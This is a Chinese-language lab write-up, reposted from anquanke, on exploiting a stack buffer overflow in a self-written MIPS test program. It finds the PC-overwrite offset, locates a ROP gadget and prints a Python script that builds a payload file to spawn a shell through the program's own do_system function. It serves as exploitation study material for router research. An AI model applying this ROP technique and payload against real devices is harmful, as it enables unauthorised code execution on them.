这份实践来自于学习-解密路由器漏洞的笔记和总结。主要用来回顾和巩固整个过程,整个过程里面不是非常顺利,主要的问题点在于对于溢出函数的地址的确定。
这个自己写的漏洞代码主要基于MIPS的编译器进行编译,通过这份基础的溢出漏洞学习,主要用来为之后在路由器的漏洞溢出实践中打好基础。
下面开始review整个过程。
#include
#include
#include
void do_system(int code,char *cmd)
{
char buf[255];
//sleep(1);
system(cmd);
}
void main()
{
char buf[256]={0};
char ch;
int count = 0;
unsigned int fileLen = 0;
struct stat fileData;
FILE *fp;
if(0 == stat("passwd",&fileData))
fileLen = fileData.st_size;
else
return 1;
if((fp = fopen("passwd","rb")) == NULL)
{
printf("Cannot open file passwd!\n");
exit(1);
}
ch=fgetc(fp);
while(count <= fileLen)
{
buf[count++] = ch;
ch = fgetc(fp);
}
buf[--count] = '\x00';
if(!strcmp(buf,"adminpwd"))
{
do_system(count,"ls -l");
}
else
{
printf("you have an invalid password!\n");
}
fclose(fp);
}
这份代码的主要功能就是从文档“passwd”读取密码,如果密码为adminpwd,那么就执行ls –l的指令,从而查看文件的列表。可以发现这里有个溢出的缓冲区就是来自于输入的文档“passwd”然后赋值到buf里面,由于没有对buf进行控制,所以可能产生溢出漏洞。这里我们也主要针对这个漏洞进行测试。
那么总结下来挖掘一个MIPS漏洞的过程如下:
A. 确定能够覆盖函数地址的偏移,即劫持PC;
B. 寻找可以用来执行命令的函数;
C. 构造ROP chain;
D. 漏洞利用测试。
$ python patternLocOffset.py –c –l 600 –f passwd
[*] Create pattern string contains 600 characters ok!
[+] output to passwd ok!
[+] take time: 0.0026 s
通过这个命令可以产生一个长度为600的溢出测试字符串,并且存储到名为passwd的文件中。
$ python patternLocOffset.py -l 600 -s 0x6E37416E
[*] Create pattern string contains 600 characters ok!
[*] Exact match at offset 412
[+] take time: 0.0036 s
可以发现,我们可以成功控制PC。
有两种方式进行漏洞利用:1)复用程序里面的函数调用;2)构造shellcode。我们这里主要进行程序里面函数复用的测试方式,shellcode的方式在之后再进行测试和使用。通过前面的程序内容分析,可以发现,系统里面有一个函数do_system_0函数可以执行指令:ls –l。虽然仅仅只能执行一个命令,但是只要对该函数的参数进行有效的溢出攻击,那么就能够实现任意系统命令的执行。在此之前,我们需要找一下可以构造函数溢出并且能够返回的一个中间跳转代码块,这里利用IDA的plugin mipsrop进行寻找:
指令执行之后,可以找到这个位置的代码进行测试:text:00402050. 然后到对应的代码段看,
可以发现这段代码的功能,只要在$SP+0x54的位置存入需要执行的do_system_0函数的地址,然后在$SP+0x18的位置放入需要传入的指令,就能够实现任意命令的执行。
从上面的截图中可以发现do_system_0的函数䢑为0x00400420.
import struct
cmd = "sh" # command string
cmd += "\x00"*(4 - (len(cmd) % 4)) # align by 4 bytes
#shellcode
shellcode = "A"*0x19C # padding buf
shellcode += struct.pack(">L",0x00402050) # "\x00\x40\x1F\xA0"(PC)
shellcode += "A"*24 # padding before command
shellcode += cmd # command($a1)
shellcode += "B"*(0x3C - len(cmd)) # padding
shellcode += struct.pack(">L",0x00400420) # "\x00\x40\x05\x90"
shellcode += "BBBB" # padding
print ' ok!'
#create password file
print '[+] create password file',
fw = open('passwd','w')
fw.write(shellcode)#'A'*300+'\x00'*10+'BBBB')
fw.close()
print ' ok!'
可以发现成功的进行了漏洞的利用,
到这里,MIPS程序的基础的漏洞利用测试就完成了。
总结一下,这个程序里面有一个内部的do_system_0函数,并且不安全的输入源是输入文件passwd可以用来构造溢出漏洞文件。在之后的程序利用中,很可能主功能的程序里面并没有一个可以利用的函数让我们进行函数的溢出漏洞利用,需要进行shellcode的设计,即从系统库函数里面找到system函数,并且调用与执行。后者的问题稍微麻烦些。
且,当前的这个函数do_system_0里面,对于输入字符串的读取,并不是一个字符串方式的提取,因此,如果是字符串的提取,会对于一些字节进行截取:0x00,如果指令里面存在这样的字符串,可能会导致注入程序的字符串被截断,从而导致程序漏洞利用失败。为此,需要进行shellcode编码或者用其他指令代替或者多跳转几次ROP chain从而将bad byte消除。
转载:https://www.anquanke.com/post/id/148551